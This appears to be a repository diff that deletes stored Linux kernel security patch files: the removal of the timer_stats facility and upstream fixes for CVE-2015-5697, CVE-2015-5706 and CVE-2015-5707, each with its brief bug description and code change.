Biederman" -Cc: Olof Johansson -Cc: Andrew Morton -Cc: linux-api@vger.kernel.org -Cc: Arjan van de Ven -Link: http://lkml.kernel.org/r/20170208192659.GA32582@beast -Signed-off-by: Thomas Gleixner ---- - Documentation/timers/timer_stats.txt | 73 ------ - include/linux/hrtimer.h | 11 - - include/linux/timer.h | 45 ---- - kernel/kthread.c | 1 - - kernel/time/Makefile | 1 - - kernel/time/hrtimer.c | 38 ---- - kernel/time/timer.c | 48 +--- - kernel/time/timer_list.c | 10 - - kernel/time/timer_stats.c | 425 ----------------------------------- - kernel/workqueue.c | 2 - - lib/Kconfig.debug | 14 -- - 11 files changed, 2 insertions(+), 666 deletions(-) - delete mode 100644 Documentation/timers/timer_stats.txt - delete mode 100644 kernel/time/timer_stats.c - -diff --git a/Documentation/timers/timer_stats.txt b/Documentation/timers/timer_stats.txt -deleted file mode 100644 -index de835ee..0000000 ---- a/Documentation/timers/timer_stats.txt -+++ /dev/null -@@ -1,73 +0,0 @@ --timer_stats - timer usage statistics -------------------------------------- -- --timer_stats is a debugging facility to make the timer (ab)usage in a Linux --system visible to kernel and userspace developers. If enabled in the config --but not used it has almost zero runtime overhead, and a relatively small --data structure overhead. Even if collection is enabled runtime all the --locking is per-CPU and lookup is hashed. -- --timer_stats should be used by kernel and userspace developers to verify that --their code does not make unduly use of timers. This helps to avoid unnecessary --wakeups, which should be avoided to optimize power consumption. -- --It can be enabled by CONFIG_TIMER_STATS in the "Kernel hacking" configuration --section. 
-- --timer_stats collects information about the timer events which are fired in a --Linux system over a sample period: -- --- the pid of the task(process) which initialized the timer --- the name of the process which initialized the timer --- the function where the timer was initialized --- the callback function which is associated to the timer --- the number of events (callbacks) -- --timer_stats adds an entry to /proc: /proc/timer_stats -- --This entry is used to control the statistics functionality and to read out the --sampled information. -- --The timer_stats functionality is inactive on bootup. -- --To activate a sample period issue: --# echo 1 >/proc/timer_stats -- --To stop a sample period issue: --# echo 0 >/proc/timer_stats -- --The statistics can be retrieved by: --# cat /proc/timer_stats -- --While sampling is enabled, each readout from /proc/timer_stats will see --newly updated statistics. Once sampling is disabled, the sampled information --is kept until a new sample period is started. This allows multiple readouts. -- --Sample output of /proc/timer_stats: -- --Timerstats sample period: 3.888770 s -- 12, 0 swapper hrtimer_stop_sched_tick (hrtimer_sched_tick) -- 15, 1 swapper hcd_submit_urb (rh_timer_func) -- 4, 959 kedac schedule_timeout (process_timeout) -- 1, 0 swapper page_writeback_init (wb_timer_fn) -- 28, 0 swapper hrtimer_stop_sched_tick (hrtimer_sched_tick) -- 22, 2948 IRQ 4 tty_flip_buffer_push (delayed_work_timer_fn) -- 3, 3100 bash schedule_timeout (process_timeout) -- 1, 1 swapper queue_delayed_work_on (delayed_work_timer_fn) -- 1, 1 swapper queue_delayed_work_on (delayed_work_timer_fn) -- 1, 1 swapper neigh_table_init_no_netlink (neigh_periodic_timer) -- 1, 2292 ip __netdev_watchdog_up (dev_watchdog) -- 1, 23 events/1 do_cache_clean (delayed_work_timer_fn) --90 total events, 30.0 events/sec -- --The first column is the number of events, the second column the pid, the third --column is the name of the process. 
The forth column shows the function which --initialized the timer and in parenthesis the callback function which was --executed on expiry. -- -- Thomas, Ingo -- --Added flag to indicate 'deferrable timer' in /proc/timer_stats. A deferrable --timer will appear as follows -- 10D, 1 swapper queue_delayed_work_on (delayed_work_timer_fn) -- -diff --git a/include/linux/hrtimer.h b/include/linux/hrtimer.h -index cdab81b..e52b427 100644 ---- a/include/linux/hrtimer.h -+++ b/include/linux/hrtimer.h -@@ -88,12 +88,6 @@ enum hrtimer_restart { - * @base: pointer to the timer base (per cpu and per clock) - * @state: state information (See bit values above) - * @is_rel: Set if the timer was armed relative -- * @start_pid: timer statistics field to store the pid of the task which -- * started the timer -- * @start_site: timer statistics field to store the site where the timer -- * was started -- * @start_comm: timer statistics field to store the name of the process which -- * started the timer - * - * The hrtimer structure must be initialized by hrtimer_init() - */ -@@ -104,11 +98,6 @@ struct hrtimer { - struct hrtimer_clock_base *base; - u8 state; - u8 is_rel; --#ifdef CONFIG_TIMER_STATS -- int start_pid; -- void *start_site; -- char start_comm[16]; --#endif - }; - - /** -diff --git a/include/linux/timer.h b/include/linux/timer.h -index 51d601f..5a209b8 100644 ---- a/include/linux/timer.h -+++ b/include/linux/timer.h -@@ -20,11 +20,6 @@ struct timer_list { - unsigned long data; - u32 flags; - --#ifdef CONFIG_TIMER_STATS -- int start_pid; -- void *start_site; -- char start_comm[16]; --#endif - #ifdef CONFIG_LOCKDEP - struct lockdep_map lockdep_map; - #endif -@@ -197,46 +192,6 @@ extern int mod_timer_pending(struct timer_list *timer, unsigned long expires); - */ - #define NEXT_TIMER_MAX_DELTA ((1UL << 30) - 1) - --/* -- * Timer-statistics info: -- */ --#ifdef CONFIG_TIMER_STATS -- --extern int timer_stats_active; -- --extern void init_timer_stats(void); -- --extern void 
timer_stats_update_stats(void *timer, pid_t pid, void *startf, -- void *timerf, char *comm, u32 flags); -- --extern void __timer_stats_timer_set_start_info(struct timer_list *timer, -- void *addr); -- --static inline void timer_stats_timer_set_start_info(struct timer_list *timer) --{ -- if (likely(!timer_stats_active)) -- return; -- __timer_stats_timer_set_start_info(timer, __builtin_return_address(0)); --} -- --static inline void timer_stats_timer_clear_start_info(struct timer_list *timer) --{ -- timer->start_site = NULL; --} --#else --static inline void init_timer_stats(void) --{ --} -- --static inline void timer_stats_timer_set_start_info(struct timer_list *timer) --{ --} -- --static inline void timer_stats_timer_clear_start_info(struct timer_list *timer) --{ --} --#endif -- - extern void add_timer(struct timer_list *timer); - - extern int try_to_del_timer_sync(struct timer_list *timer); -diff --git a/kernel/kthread.c b/kernel/kthread.c -index 2318fba..8461a43 100644 ---- a/kernel/kthread.c -+++ b/kernel/kthread.c -@@ -850,7 +850,6 @@ void __kthread_queue_delayed_work(struct kthread_worker *worker, - - list_add(&work->node, &worker->delayed_work_list); - work->worker = worker; -- timer_stats_timer_set_start_info(&dwork->timer); - timer->expires = jiffies + delay; - add_timer(timer); - } -diff --git a/kernel/time/Makefile b/kernel/time/Makefile -index 976840d..938dbf3 100644 ---- a/kernel/time/Makefile -+++ b/kernel/time/Makefile -@@ -15,6 +15,5 @@ ifeq ($(CONFIG_GENERIC_CLOCKEVENTS_BROADCAST),y) - endif - obj-$(CONFIG_GENERIC_SCHED_CLOCK) += sched_clock.o - obj-$(CONFIG_TICK_ONESHOT) += tick-oneshot.o tick-sched.o --obj-$(CONFIG_TIMER_STATS) += timer_stats.o - obj-$(CONFIG_DEBUG_FS) += timekeeping_debug.o - obj-$(CONFIG_TEST_UDELAY) += test_udelay.o -diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c -index c6ecedd..edabde6 100644 ---- a/kernel/time/hrtimer.c -+++ b/kernel/time/hrtimer.c -@@ -766,34 +766,6 @@ void hrtimers_resume(void) - 
clock_was_set_delayed(); - } - --static inline void timer_stats_hrtimer_set_start_info(struct hrtimer *timer) --{ --#ifdef CONFIG_TIMER_STATS -- if (timer->start_site) -- return; -- timer->start_site = __builtin_return_address(0); -- memcpy(timer->start_comm, current->comm, TASK_COMM_LEN); -- timer->start_pid = current->pid; --#endif --} -- --static inline void timer_stats_hrtimer_clear_start_info(struct hrtimer *timer) --{ --#ifdef CONFIG_TIMER_STATS -- timer->start_site = NULL; --#endif --} -- --static inline void timer_stats_account_hrtimer(struct hrtimer *timer) --{ --#ifdef CONFIG_TIMER_STATS -- if (likely(!timer_stats_active)) -- return; -- timer_stats_update_stats(timer, timer->start_pid, timer->start_site, -- timer->function, timer->start_comm, 0); --#endif --} -- - /* - * Counterpart to lock_hrtimer_base above: - */ -@@ -932,7 +904,6 @@ remove_hrtimer(struct hrtimer *timer, struct hrtimer_clock_base *base, bool rest - * rare case and less expensive than a smp call. - */ - debug_deactivate(timer); -- timer_stats_hrtimer_clear_start_info(timer); - reprogram = base->cpu_base == this_cpu_ptr(&hrtimer_bases); - - if (!restart) -@@ -990,8 +961,6 @@ void hrtimer_start_range_ns(struct hrtimer *timer, ktime_t tim, - /* Switch the timer base, if necessary: */ - new_base = switch_hrtimer_base(timer, base, mode & HRTIMER_MODE_PINNED); - -- timer_stats_hrtimer_set_start_info(timer); -- - leftmost = enqueue_hrtimer(timer, new_base); - if (!leftmost) - goto unlock; -@@ -1128,12 +1097,6 @@ static void __hrtimer_init(struct hrtimer *timer, clockid_t clock_id, - base = hrtimer_clockid_to_base(clock_id); - timer->base = &cpu_base->clock_base[base]; - timerqueue_init(&timer->node); -- --#ifdef CONFIG_TIMER_STATS -- timer->start_site = NULL; -- timer->start_pid = -1; -- memset(timer->start_comm, 0, TASK_COMM_LEN); --#endif - } - - /** -@@ -1217,7 +1180,6 @@ static void __run_hrtimer(struct hrtimer_cpu_base *cpu_base, - raw_write_seqcount_barrier(&cpu_base->seq); - - 
__remove_hrtimer(timer, base, HRTIMER_STATE_INACTIVE, 0); -- timer_stats_account_hrtimer(timer); - fn = timer->function; - - /* -diff --git a/kernel/time/timer.c b/kernel/time/timer.c -index ec33a69..82a6bfa 100644 ---- a/kernel/time/timer.c -+++ b/kernel/time/timer.c -@@ -571,38 +571,6 @@ internal_add_timer(struct timer_base *base, struct timer_list *timer) - trigger_dyntick_cpu(base, timer); - } - --#ifdef CONFIG_TIMER_STATS --void __timer_stats_timer_set_start_info(struct timer_list *timer, void *addr) --{ -- if (timer->start_site) -- return; -- -- timer->start_site = addr; -- memcpy(timer->start_comm, current->comm, TASK_COMM_LEN); -- timer->start_pid = current->pid; --} -- --static void timer_stats_account_timer(struct timer_list *timer) --{ -- void *site; -- -- /* -- * start_site can be concurrently reset by -- * timer_stats_timer_clear_start_info() -- */ -- site = READ_ONCE(timer->start_site); -- if (likely(!site)) -- return; -- -- timer_stats_update_stats(timer, timer->start_pid, site, -- timer->function, timer->start_comm, -- timer->flags); --} -- --#else --static void timer_stats_account_timer(struct timer_list *timer) {} --#endif -- - #ifdef CONFIG_DEBUG_OBJECTS_TIMERS - - static struct debug_obj_descr timer_debug_descr; -@@ -789,11 +757,6 @@ static void do_init_timer(struct timer_list *timer, unsigned int flags, - { - timer->entry.pprev = NULL; - timer->flags = flags | raw_smp_processor_id(); --#ifdef CONFIG_TIMER_STATS -- timer->start_site = NULL; -- timer->start_pid = -1; -- memset(timer->start_comm, 0, TASK_COMM_LEN); --#endif - lockdep_init_map(&timer->lockdep_map, name, key, 0); - } - -@@ -1001,8 +964,6 @@ __mod_timer(struct timer_list *timer, unsigned long expires, bool pending_only) - base = lock_timer_base(timer, &flags); - } - -- timer_stats_timer_set_start_info(timer); -- - ret = detach_if_pending(timer, base, false); - if (!ret && pending_only) - goto out_unlock; -@@ -1130,7 +1091,6 @@ void add_timer_on(struct timer_list *timer, int cpu) - 
struct timer_base *new_base, *base; - unsigned long flags; - -- timer_stats_timer_set_start_info(timer); - BUG_ON(timer_pending(timer) || !timer->function); - - new_base = get_timer_cpu_base(timer->flags, cpu); -@@ -1176,7 +1136,6 @@ int del_timer(struct timer_list *timer) - - debug_assert_init(timer); - -- timer_stats_timer_clear_start_info(timer); - if (timer_pending(timer)) { - base = lock_timer_base(timer, &flags); - ret = detach_if_pending(timer, base, true); -@@ -1204,10 +1163,9 @@ int try_to_del_timer_sync(struct timer_list *timer) - - base = lock_timer_base(timer, &flags); - -- if (base->running_timer != timer) { -- timer_stats_timer_clear_start_info(timer); -+ if (base->running_timer != timer) - ret = detach_if_pending(timer, base, true); -- } -+ - spin_unlock_irqrestore(&base->lock, flags); - - return ret; -@@ -1331,7 +1289,6 @@ static void expire_timers(struct timer_base *base, struct hlist_head *head) - unsigned long data; - - timer = hlist_entry(head->first, struct timer_list, entry); -- timer_stats_account_timer(timer); - - base->running_timer = timer; - detach_timer(timer, true); -@@ -1868,7 +1825,6 @@ static void __init init_timer_cpus(void) - void __init init_timers(void) - { - init_timer_cpus(); -- init_timer_stats(); - open_softirq(TIMER_SOFTIRQ, run_timer_softirq); - } - -diff --git a/kernel/time/timer_list.c b/kernel/time/timer_list.c -index afe6cd1..387a3a5 100644 ---- a/kernel/time/timer_list.c -+++ b/kernel/time/timer_list.c -@@ -62,21 +62,11 @@ static void - print_timer(struct seq_file *m, struct hrtimer *taddr, struct hrtimer *timer, - int idx, u64 now) - { --#ifdef CONFIG_TIMER_STATS -- char tmp[TASK_COMM_LEN + 1]; --#endif - SEQ_printf(m, " #%d: ", idx); - print_name_offset(m, taddr); - SEQ_printf(m, ", "); - print_name_offset(m, timer->function); - SEQ_printf(m, ", S:%02x", timer->state); --#ifdef CONFIG_TIMER_STATS -- SEQ_printf(m, ", "); -- print_name_offset(m, timer->start_site); -- memcpy(tmp, timer->start_comm, TASK_COMM_LEN); -- 
tmp[TASK_COMM_LEN] = 0; -- SEQ_printf(m, ", %s/%d", tmp, timer->start_pid); --#endif - SEQ_printf(m, "\n"); - SEQ_printf(m, " # expires at %Lu-%Lu nsecs [in %Ld to %Ld nsecs]\n", - (unsigned long long)ktime_to_ns(hrtimer_get_softexpires(timer)), -diff --git a/kernel/time/timer_stats.c b/kernel/time/timer_stats.c -deleted file mode 100644 -index afddded..0000000 ---- a/kernel/time/timer_stats.c -+++ /dev/null -@@ -1,425 +0,0 @@ --/* -- * kernel/time/timer_stats.c -- * -- * Collect timer usage statistics. -- * -- * Copyright(C) 2006, Red Hat, Inc., Ingo Molnar -- * Copyright(C) 2006 Timesys Corp., Thomas Gleixner -- * -- * timer_stats is based on timer_top, a similar functionality which was part of -- * Con Kolivas dyntick patch set. It was developed by Daniel Petrini at the -- * Instituto Nokia de Tecnologia - INdT - Manaus. timer_top's design was based -- * on dynamic allocation of the statistics entries and linear search based -- * lookup combined with a global lock, rather than the static array, hash -- * and per-CPU locking which is used by timer_stats. It was written for the -- * pre hrtimer kernel code and therefore did not take hrtimers into account. -- * Nevertheless it provided the base for the timer_stats implementation and -- * was a helpful source of inspiration. Kudos to Daniel and the Nokia folks -- * for this effort. -- * -- * timer_top.c is -- * Copyright (C) 2005 Instituto Nokia de Tecnologia - INdT - Manaus -- * Written by Daniel Petrini -- * timer_top.c was released under the GNU General Public License version 2 -- * -- * We export the addresses and counting of timer functions being called, -- * the pid and cmdline from the owner process if applicable. 
-- * -- * Start/stop data collection: -- * # echo [1|0] >/proc/timer_stats -- * -- * Display the information collected so far: -- * # cat /proc/timer_stats -- * -- * This program is free software; you can redistribute it and/or modify -- * it under the terms of the GNU General Public License version 2 as -- * published by the Free Software Foundation. -- */ -- --#include --#include --#include --#include --#include --#include -- --#include -- --/* -- * This is our basic unit of interest: a timer expiry event identified -- * by the timer, its start/expire functions and the PID of the task that -- * started the timer. We count the number of times an event happens: -- */ --struct entry { -- /* -- * Hash list: -- */ -- struct entry *next; -- -- /* -- * Hash keys: -- */ -- void *timer; -- void *start_func; -- void *expire_func; -- pid_t pid; -- -- /* -- * Number of timeout events: -- */ -- unsigned long count; -- u32 flags; -- -- /* -- * We save the command-line string to preserve -- * this information past task exit: -- */ -- char comm[TASK_COMM_LEN + 1]; -- --} ____cacheline_aligned_in_smp; -- --/* -- * Spinlock protecting the tables - not taken during lookup: -- */ --static DEFINE_RAW_SPINLOCK(table_lock); -- --/* -- * Per-CPU lookup locks for fast hash lookup: -- */ --static DEFINE_PER_CPU(raw_spinlock_t, tstats_lookup_lock); -- --/* -- * Mutex to serialize state changes with show-stats activities: -- */ --static DEFINE_MUTEX(show_mutex); -- --/* -- * Collection status, active/inactive: -- */ --int __read_mostly timer_stats_active; -- --/* -- * Beginning/end timestamps of measurement: -- */ --static ktime_t time_start, time_stop; -- --/* -- * tstat entry structs only get allocated while collection is -- * active and never freed during that time - this simplifies -- * things quite a bit. -- * -- * They get freed when a new collection period is started. 
-- */ --#define MAX_ENTRIES_BITS 10 --#define MAX_ENTRIES (1UL << MAX_ENTRIES_BITS) -- --static unsigned long nr_entries; --static struct entry entries[MAX_ENTRIES]; -- --static atomic_t overflow_count; -- --/* -- * The entries are in a hash-table, for fast lookup: -- */ --#define TSTAT_HASH_BITS (MAX_ENTRIES_BITS - 1) --#define TSTAT_HASH_SIZE (1UL << TSTAT_HASH_BITS) --#define TSTAT_HASH_MASK (TSTAT_HASH_SIZE - 1) -- --#define __tstat_hashfn(entry) \ -- (((unsigned long)(entry)->timer ^ \ -- (unsigned long)(entry)->start_func ^ \ -- (unsigned long)(entry)->expire_func ^ \ -- (unsigned long)(entry)->pid ) & TSTAT_HASH_MASK) -- --#define tstat_hashentry(entry) (tstat_hash_table + __tstat_hashfn(entry)) -- --static struct entry *tstat_hash_table[TSTAT_HASH_SIZE] __read_mostly; -- --static void reset_entries(void) --{ -- nr_entries = 0; -- memset(entries, 0, sizeof(entries)); -- memset(tstat_hash_table, 0, sizeof(tstat_hash_table)); -- atomic_set(&overflow_count, 0); --} -- --static struct entry *alloc_entry(void) --{ -- if (nr_entries >= MAX_ENTRIES) -- return NULL; -- -- return entries + nr_entries++; --} -- --static int match_entries(struct entry *entry1, struct entry *entry2) --{ -- return entry1->timer == entry2->timer && -- entry1->start_func == entry2->start_func && -- entry1->expire_func == entry2->expire_func && -- entry1->pid == entry2->pid; --} -- --/* -- * Look up whether an entry matching this item is present -- * in the hash already. 
Must be called with irqs off and the -- * lookup lock held: -- */ --static struct entry *tstat_lookup(struct entry *entry, char *comm) --{ -- struct entry **head, *curr, *prev; -- -- head = tstat_hashentry(entry); -- curr = *head; -- -- /* -- * The fastpath is when the entry is already hashed, -- * we do this with the lookup lock held, but with the -- * table lock not held: -- */ -- while (curr) { -- if (match_entries(curr, entry)) -- return curr; -- -- curr = curr->next; -- } -- /* -- * Slowpath: allocate, set up and link a new hash entry: -- */ -- prev = NULL; -- curr = *head; -- -- raw_spin_lock(&table_lock); -- /* -- * Make sure we have not raced with another CPU: -- */ -- while (curr) { -- if (match_entries(curr, entry)) -- goto out_unlock; -- -- prev = curr; -- curr = curr->next; -- } -- -- curr = alloc_entry(); -- if (curr) { -- *curr = *entry; -- curr->count = 0; -- curr->next = NULL; -- memcpy(curr->comm, comm, TASK_COMM_LEN); -- -- smp_mb(); /* Ensure that curr is initialized before insert */ -- -- if (prev) -- prev->next = curr; -- else -- *head = curr; -- } -- out_unlock: -- raw_spin_unlock(&table_lock); -- -- return curr; --} -- --/** -- * timer_stats_update_stats - Update the statistics for a timer. -- * @timer: pointer to either a timer_list or a hrtimer -- * @pid: the pid of the task which set up the timer -- * @startf: pointer to the function which did the timer setup -- * @timerf: pointer to the timer callback function of the timer -- * @comm: name of the process which set up the timer -- * @tflags: The flags field of the timer -- * -- * When the timer is already registered, then the event counter is -- * incremented. Otherwise the timer is registered in a free slot. 
-- */ --void timer_stats_update_stats(void *timer, pid_t pid, void *startf, -- void *timerf, char *comm, u32 tflags) --{ -- /* -- * It doesn't matter which lock we take: -- */ -- raw_spinlock_t *lock; -- struct entry *entry, input; -- unsigned long flags; -- -- if (likely(!timer_stats_active)) -- return; -- -- lock = &per_cpu(tstats_lookup_lock, raw_smp_processor_id()); -- -- input.timer = timer; -- input.start_func = startf; -- input.expire_func = timerf; -- input.pid = pid; -- input.flags = tflags; -- -- raw_spin_lock_irqsave(lock, flags); -- if (!timer_stats_active) -- goto out_unlock; -- -- entry = tstat_lookup(&input, comm); -- if (likely(entry)) -- entry->count++; -- else -- atomic_inc(&overflow_count); -- -- out_unlock: -- raw_spin_unlock_irqrestore(lock, flags); --} -- --static void print_name_offset(struct seq_file *m, unsigned long addr) --{ -- char symname[KSYM_NAME_LEN]; -- -- if (lookup_symbol_name(addr, symname) < 0) -- seq_printf(m, "<%p>", (void *)addr); -- else -- seq_printf(m, "%s", symname); --} -- --static int tstats_show(struct seq_file *m, void *v) --{ -- struct timespec64 period; -- struct entry *entry; -- unsigned long ms; -- long events = 0; -- ktime_t time; -- int i; -- -- mutex_lock(&show_mutex); -- /* -- * If still active then calculate up to now: -- */ -- if (timer_stats_active) -- time_stop = ktime_get(); -- -- time = ktime_sub(time_stop, time_start); -- -- period = ktime_to_timespec64(time); -- ms = period.tv_nsec / 1000000; -- -- seq_puts(m, "Timer Stats Version: v0.3\n"); -- seq_printf(m, "Sample period: %ld.%03ld s\n", (long)period.tv_sec, ms); -- if (atomic_read(&overflow_count)) -- seq_printf(m, "Overflow: %d entries\n", atomic_read(&overflow_count)); -- seq_printf(m, "Collection: %s\n", timer_stats_active ? 
"active" : "inactive"); -- -- for (i = 0; i < nr_entries; i++) { -- entry = entries + i; -- if (entry->flags & TIMER_DEFERRABLE) { -- seq_printf(m, "%4luD, %5d %-16s ", -- entry->count, entry->pid, entry->comm); -- } else { -- seq_printf(m, " %4lu, %5d %-16s ", -- entry->count, entry->pid, entry->comm); -- } -- -- print_name_offset(m, (unsigned long)entry->start_func); -- seq_puts(m, " ("); -- print_name_offset(m, (unsigned long)entry->expire_func); -- seq_puts(m, ")\n"); -- -- events += entry->count; -- } -- -- ms += period.tv_sec * 1000; -- if (!ms) -- ms = 1; -- -- if (events && period.tv_sec) -- seq_printf(m, "%ld total events, %ld.%03ld events/sec\n", -- events, events * 1000 / ms, -- (events * 1000000 / ms) % 1000); -- else -- seq_printf(m, "%ld total events\n", events); -- -- mutex_unlock(&show_mutex); -- -- return 0; --} -- --/* -- * After a state change, make sure all concurrent lookup/update -- * activities have stopped: -- */ --static void sync_access(void) --{ -- unsigned long flags; -- int cpu; -- -- for_each_online_cpu(cpu) { -- raw_spinlock_t *lock = &per_cpu(tstats_lookup_lock, cpu); -- -- raw_spin_lock_irqsave(lock, flags); -- /* nothing */ -- raw_spin_unlock_irqrestore(lock, flags); -- } --} -- --static ssize_t tstats_write(struct file *file, const char __user *buf, -- size_t count, loff_t *offs) --{ -- char ctl[2]; -- -- if (count != 2 || *offs) -- return -EINVAL; -- -- if (copy_from_user(ctl, buf, count)) -- return -EFAULT; -- -- mutex_lock(&show_mutex); -- switch (ctl[0]) { -- case '0': -- if (timer_stats_active) { -- timer_stats_active = 0; -- time_stop = ktime_get(); -- sync_access(); -- } -- break; -- case '1': -- if (!timer_stats_active) { -- reset_entries(); -- time_start = ktime_get(); -- smp_mb(); -- timer_stats_active = 1; -- } -- break; -- default: -- count = -EINVAL; -- } -- mutex_unlock(&show_mutex); -- -- return count; --} -- --static int tstats_open(struct inode *inode, struct file *filp) --{ -- return single_open(filp, 
tstats_show, NULL); --} -- --static const struct file_operations tstats_fops = { -- .open = tstats_open, -- .read = seq_read, -- .write = tstats_write, -- .llseek = seq_lseek, -- .release = single_release, --}; -- --void __init init_timer_stats(void) --{ -- int cpu; -- -- for_each_possible_cpu(cpu) -- raw_spin_lock_init(&per_cpu(tstats_lookup_lock, cpu)); --} -- --static int __init init_tstats_procfs(void) --{ -- struct proc_dir_entry *pe; -- -- pe = proc_create("timer_stats", 0644, NULL, &tstats_fops); -- if (!pe) -- return -ENOMEM; -- return 0; --} --__initcall(init_tstats_procfs); -diff --git a/kernel/workqueue.c b/kernel/workqueue.c -index 1d9fb65..072cbc9 100644 ---- a/kernel/workqueue.c -+++ b/kernel/workqueue.c -@@ -1523,8 +1523,6 @@ static void __queue_delayed_work(int cpu, struct workqueue_struct *wq, - return; - } - -- timer_stats_timer_set_start_info(&dwork->timer); -- - dwork->wq = wq; - dwork->cpu = cpu; - timer->expires = jiffies + delay; -diff --git a/lib/Kconfig.debug b/lib/Kconfig.debug -index eb9e9a7..132af33 100644 ---- a/lib/Kconfig.debug -+++ b/lib/Kconfig.debug -@@ -980,20 +980,6 @@ config DEBUG_TIMEKEEPING - - If unsure, say N. - --config TIMER_STATS -- bool "Collect kernel timers statistics" -- depends on DEBUG_KERNEL && PROC_FS -- help -- If you say Y here, additional code will be inserted into the -- timer routines to collect statistics about kernel timers being -- reprogrammed. The statistics can be read from /proc/timer_stats. -- The statistics collection is started by writing 1 to /proc/timer_stats, -- writing 0 stops it. This feature is useful to collect information -- about timer usage patterns in kernel and userspace. This feature -- is lightweight if enabled in the kernel config but not activated -- (it defaults to deactivated on bootup and will only be activated -- if some application like powertop activates it explicitly). 
--
- config DEBUG_PREEMPT
- bool "Debug preemptible kernel"
- depends on DEBUG_KERNEL && PREEMPT && TRACE_IRQFLAGS_SUPPORT
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-5697/^4.1/0001.patch b/Patches/Linux_CVEs/CVE-2015-5697/^4.1/0001.patch
deleted file mode 100644
index d230b3aa..00000000
--- a/Patches/Linux_CVEs/CVE-2015-5697/^4.1/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From b6878d9e03043695dbf3fa1caa6dfc09db225b16 Mon Sep 17 00:00:00 2001
-From: Benjamin Randazzo
-Date: Sat, 25 Jul 2015 16:36:50 +0200
-Subject: [PATCH] md: use kzalloc() when bitmap is disabled
-
-In drivers/md/md.c get_bitmap_file() uses kmalloc() for creating a
-mdu_bitmap_file_t called "file".
-
-5769 file = kmalloc(sizeof(*file), GFP_NOIO);
-5770 if (!file)
-5771 return -ENOMEM;
-
-This structure is copied to user space at the end of the function.
-
-5786 if (err == 0 &&
-5787 copy_to_user(arg, file, sizeof(*file)))
-5788 err = -EFAULT
-
-But if bitmap is disabled only the first byte of "file" is initialized
-with zero, so it's possible to read some bytes (up to 4095) of kernel
-space memory from user space. This is an information leak.
-
-5775 /* bitmap disabled, zero the first byte and copy out */
-5776 if (!mddev->bitmap_info.file)
-5777 file->pathname[0] = '\0';
-
-Signed-off-by: Benjamin Randazzo
-Signed-off-by: NeilBrown
----
- drivers/md/md.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/md/md.c b/drivers/md/md.c
-index 0c2a4e8b873c6..e25f00f0138a7 100644
---- a/drivers/md/md.c
-+++ b/drivers/md/md.c
-@@ -5759,7 +5759,7 @@ static int get_bitmap_file(struct mddev *mddev, void __user * arg)
- char *ptr;
- int err;
-
-- file = kmalloc(sizeof(*file), GFP_NOIO);
-+ file = kzalloc(sizeof(*file), GFP_NOIO);
- if (!file)
- return -ENOMEM;
-
diff --git a/Patches/Linux_CVEs/CVE-2015-5706/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-5706/ANY/0001.patch
deleted file mode 100644
index f63b5535..00000000
--- a/Patches/Linux_CVEs/CVE-2015-5706/ANY/0001.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From f15133df088ecadd141ea1907f2c96df67c729f0 Mon Sep 17 00:00:00 2001
-From: Al Viro
-Date: Fri, 8 May 2015 22:53:15 -0400
-Subject: path_openat(): fix double fput()
-
-path_openat() jumps to the wrong place after do_tmpfile() - it has
-already done path_cleanup() (as part of path_lookupat() called by
-do_tmpfile()), so doing that again can lead to double fput().
-
-Cc: stable@vger.kernel.org # v3.11+
-Signed-off-by: Al Viro
----
- fs/namei.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/fs/namei.c b/fs/namei.c
-index f67cf6c..fe30d3b 100644
---- a/fs/namei.c
-+++ b/fs/namei.c
-@@ -3233,7 +3233,7 @@ static struct file *path_openat(int dfd, struct filename *pathname,
-
- if (unlikely(file->f_flags & __O_TMPFILE)) {
- error = do_tmpfile(dfd, pathname, nd, flags, op, file, &opened);
-- goto out;
-+ goto out2;
- }
-
- error = path_init(dfd, pathname, flags, nd);
-@@ -3263,6 +3263,7 @@ static struct file *path_openat(int dfd, struct filename *pathname,
- }
- out:
- path_cleanup(nd);
-+out2:
- if (!(opened & FILE_OPENED)) {
- BUG_ON(!error);
- put_filp(file);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-5707/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-5707/ANY/0001.patch
deleted file mode 100644
index d462c86f..00000000
--- a/Patches/Linux_CVEs/CVE-2015-5707/ANY/0001.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 451a2886b6bf90e2fb378f7c46c655450fb96e81 Mon Sep 17 00:00:00 2001
-From: Al Viro
-Date: Sat, 21 Mar 2015 20:08:18 -0400
-Subject: sg_start_req(): make sure that there's not too many elements in iovec
-
-unfortunately, allowing an arbitrary 16bit value means a possibility of
-overflow in the calculation of total number of pages in bio_map_user_iov() -
-we rely on there being no more than PAGE_SIZE members of sum in the
-first loop there. If that sum wraps around, we end up allocating
-too small array of pointers to pages and it's easy to overflow it in
-the second loop.
-
-X-Coverup: TINC (and there's no lumber cartel either)
-Cc: stable@vger.kernel.org # way, way back
-Signed-off-by: Al Viro
----
- drivers/scsi/sg.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c
-index d383f84..b5a4db8 100644
---- a/drivers/scsi/sg.c
-+++ b/drivers/scsi/sg.c
-@@ -1744,6 +1744,9 @@ sg_start_req(Sg_request *srp, unsigned char *cmd)
- md->from_user = 0;
- }
-
-+ if (unlikely(iov_count > MAX_UIOVEC))
-+ return -EINVAL;
-+
- if (iov_count) {
- int size = sizeof(struct iovec) * iov_count;
- struct iovec *iov;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-5707/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2015-5707/ANY/0002.patch
deleted file mode 100644
index 124912ab..00000000
--- a/Patches/Linux_CVEs/CVE-2015-5707/ANY/0002.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From fdc81f45e9f57858da6351836507fbcf1b7583ee Mon Sep 17 00:00:00 2001
-From: Al Viro
-Date: Sat, 21 Mar 2015 20:25:30 -0400
-Subject: sg_start_req(): use import_iovec()
-
-Signed-off-by: Al Viro
----
- drivers/scsi/sg.c | 16 +++++-----------
- 1 file changed, 5 insertions(+), 11 deletions(-)
-
